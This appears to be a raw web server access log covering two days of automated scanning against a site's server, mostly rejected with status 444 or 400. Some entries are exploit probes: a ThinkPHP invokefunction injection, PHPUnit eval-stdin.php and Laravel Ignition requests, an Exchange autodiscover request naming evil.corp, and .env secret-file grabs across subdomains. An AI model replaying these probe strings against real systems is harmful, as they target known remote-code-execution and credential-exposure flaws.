[07/Nov/2021:04:30:33 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Nov/2021:04:30:35 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Nov/2021:04:30:36 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [07/Nov/2021:04:30:37 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Nov/2021:04:30:38 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Nov/2021:04:30:39 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Nov/2021:04:30:43 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Nov/2021:04:30:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Nov/2021:04:30:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Nov/2021:04:30:45 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [07/Nov/2021:04:30:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Nov/2021:05:23:17 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.198.206] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Nov/2021:05:24:56 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 198.199.111.94] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Nov/2021:05:26:40 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.195] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Nov/2021:07:15:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 104.248.247.218] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) Project-Resonance (http://project-resonance.com/) (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" [07/Nov/2021:07:33:47 +0000] 400 - GET http localhost "/ab2g" [Client 139.59.87.181] [Length 154] [Gzip -] "-" "-" [07/Nov/2021:07:33:47 +0000] 400 - GET http localhost "/ab2h" [Client 139.59.87.181] [Length 154] [Gzip -] "-" "-" [07/Nov/2021:09:18:34 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [07/Nov/2021:09:50:43 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.210.80] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Nov/2021:10:20:17 +0000] 444 - GET https 64.22.31.253 "/login?returnURL=%2F" [Client 92.118.160.1] [Length 0] [Gzip -] "Go http package" "-" [07/Nov/2021:11:34:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Nov/2021:13:26:15 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.197.63] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Nov/2021:13:51:52 +0000] 444 - GET https 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [07/Nov/2021:14:41:18 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [07/Nov/2021:14:52:36 +0000] 400 - GET https localhost "/" [Client 134.122.112.12] [Length 154] [Gzip -] "-" "-" [07/Nov/2021:14:52:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 134.122.112.12] [Length 0] [Gzip -] "l9tcpid/v1.1.0" "-" [07/Nov/2021:15:22:56 +0000] 444 - GET https test.moralanimal.net "/.env" [Client 185.149.40.23] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [07/Nov/2021:15:22:56 +0000] 444 - GET https laravel.moralanimal.net "/.env" [Client 185.149.40.23] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [07/Nov/2021:15:22:56 +0000] 444 - GET https staging.moralanimal.net "/.env" [Client 185.149.40.23] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [07/Nov/2021:15:22:56 +0000] 444 - GET https dev.moralanimal.net "/.env" [Client 185.149.40.23] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [07/Nov/2021:15:22:56 +0000] 444 - GET https admin.moralanimal.net "/.env" [Client 185.149.40.23] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [07/Nov/2021:15:22:56 +0000] 444 - GET https beta.moralanimal.net "/.env" [Client 185.149.40.23] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [07/Nov/2021:15:22:56 +0000] 444 - GET https app.moralanimal.net "/.env" [Client 185.149.40.23] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [07/Nov/2021:15:22:56 +0000] 444 - GET https api.moralanimal.net "/.env" [Client 185.149.40.23] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [07/Nov/2021:15:22:57 +0000] 444 - GET https demo.moralanimal.net "/.env" [Client 185.149.40.23] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [07/Nov/2021:15:25:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.197.173] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Nov/2021:15:29:43 +0000] 400 - POST http 64.22.31.253 "/" [Client 191.96.168.82] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36" "-" [07/Nov/2021:16:49:16 +0000] 444 - GET https 64.22.31.253 "/owa/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Nov/2021:16:51:31 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp" [Client 45.155.204.227] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [07/Nov/2021:17:16:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Nov/2021:17:47:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.226.4] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [07/Nov/2021:18:03:56 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [07/Nov/2021:18:03:56 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [07/Nov/2021:18:03:56 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [07/Nov/2021:18:03:56 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [07/Nov/2021:18:03:56 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [07/Nov/2021:18:03:56 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [07/Nov/2021:19:33:36 +0000] 400 - GET http localhost "/ab2g" [Client 64.225.10.40] [Length 154] [Gzip -] "-" "-" [07/Nov/2021:19:33:36 +0000] 400 - GET http localhost "/ab2h" [Client 64.225.10.40] [Length 154] [Gzip -] "-" "-" [07/Nov/2021:20:52:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 2.57.122.156] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [07/Nov/2021:21:24:48 +0000] 400 - GET http 64.22.31.253 "/manager/text/list" [Client 198.199.114.43] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Nov/2021:22:18:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 87.120.36.76] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24" "-" [08/Nov/2021:00:16:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Nov/2021:00:34:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.2] [Length 0] [Gzip -] "-" "-" [08/Nov/2021:00:52:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [08/Nov/2021:00:52:06 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211108084946" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [08/Nov/2021:02:34:37 +0000] 400 - GET http 64.22.31.253 "/manager/html" [Client 192.241.210.184] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Nov/2021:02:39:29 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.194.126] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Nov/2021:02:54:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.96] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Nov/2021:03:29:44 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:03:29:46 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:03:29:48 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:03:29:49 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:03:29:51 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:03:29:51 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [08/Nov/2021:03:29:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:03:29:54 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:03:29:55 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:03:29:56 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:03:29:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:03:29:58 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:03:30:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:03:30:01 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [08/Nov/2021:04:59:57 +0000] 444 - GET https 64.22.31.253 "/solr/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Nov/2021:05:24:06 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.204.110] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Nov/2021:05:24:14 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.162] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Nov/2021:05:25:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.116] [Length 0] [Gzip -] "-" "-" [08/Nov/2021:05:25:59 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.116] [Length 252] [Gzip -] "-" "-" [08/Nov/2021:05:25:59 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.116] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [08/Nov/2021:05:26:45 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.208.195] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Nov/2021:06:25:25 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [08/Nov/2021:06:28:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [08/Nov/2021:08:07:39 +0000] 444 - GET https imap.moralanimal.net "/" [Client 92.118.160.37] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [08/Nov/2021:08:24:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.172.66.138] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [08/Nov/2021:09:29:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.233.62.116] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [08/Nov/2021:09:52:33 +0000] 400 - GET http 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [08/Nov/2021:09:55:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.140.248.32] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [08/Nov/2021:09:59:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Nov/2021:10:13:21 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.204.132] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Nov/2021:11:16:12 +0000] 400 - - http localhost "-" [Client 181.214.206.222] [Length 154] [Gzip -] "-" "-" [08/Nov/2021:11:40:10 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [08/Nov/2021:11:40:10 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [08/Nov/2021:11:46:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 82.221.105.6] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [08/Nov/2021:11:46:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 82.221.105.6] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [08/Nov/2021:11:46:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 82.221.105.6] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [08/Nov/2021:11:46:49 +0000] 400 - - https localhost "-" [Client 82.221.105.6] [Length 0] [Gzip -] "-" "-" [08/Nov/2021:11:46:50 +0000] 400 - - https localhost "-" [Client 82.221.105.6] [Length 0] [Gzip -] "-" "-" [08/Nov/2021:11:46:51 +0000] 400 - - https localhost "-" [Client 82.221.105.6] [Length 0] [Gzip -] "-" "-" [08/Nov/2021:11:46:55 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 82.221.105.6] [Length 0] [Gzip -] "-" "-" [08/Nov/2021:11:46:56 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 82.221.105.6] [Length 0] [Gzip -] "-" "-" [08/Nov/2021:11:46:57 +0000] 444 - GET https 64.22.31.253 "/.well-known/security.txt" [Client 82.221.105.6] [Length 0] [Gzip -] "-" "-" [08/Nov/2021:11:58:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Nov/2021:12:07:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.140.248.32] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [08/Nov/2021:12:19:08 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [08/Nov/2021:13:29:13 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.204.44] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Nov/2021:13:57:49 +0000] 400 - GET http localhost "/ab2g" [Client 143.198.195.196] [Length 154] [Gzip -] "-" "-" [08/Nov/2021:13:57:49 +0000] 400 - GET http localhost "/ab2h" [Client 143.198.195.196] [Length 154] [Gzip -] "-" "-" [08/Nov/2021:15:03:52 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 92.118.160.9] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [08/Nov/2021:15:04:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.220.101.33] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [08/Nov/2021:15:04:14 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 23.129.64.134] [Length 0] [Gzip -] "-" "-" [08/Nov/2021:15:04:15 +0000] 444 - OPTIONS https localhost "/" [Client 23.129.64.134] [Length 0] [Gzip -] "-" "-" [08/Nov/2021:15:04:17 +0000] 400 - - https localhost "-" [Client 185.220.101.56] [Length 154] [Gzip -] "-" "-" [08/Nov/2021:15:04:25 +0000] 400 - - https localhost "-" [Client 185.220.100.243] [Length 154] [Gzip -] "-" "-" [08/Nov/2021:16:03:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.210.4] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Nov/2021:16:42:55 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [08/Nov/2021:18:03:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Nov/2021:18:03:59 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Nov/2021:18:03:59 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Nov/2021:18:03:59 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Nov/2021:18:03:59 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Nov/2021:18:03:59 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Nov/2021:18:03:59 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [08/Nov/2021:18:06:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.116] [Length 0] [Gzip -] "-" "-" [08/Nov/2021:18:06:34 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.116] [Length 252] [Gzip -] "-" "-" [08/Nov/2021:18:06:34 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.116] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [08/Nov/2021:18:50:01 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:18:50:01 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:18:50:02 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; 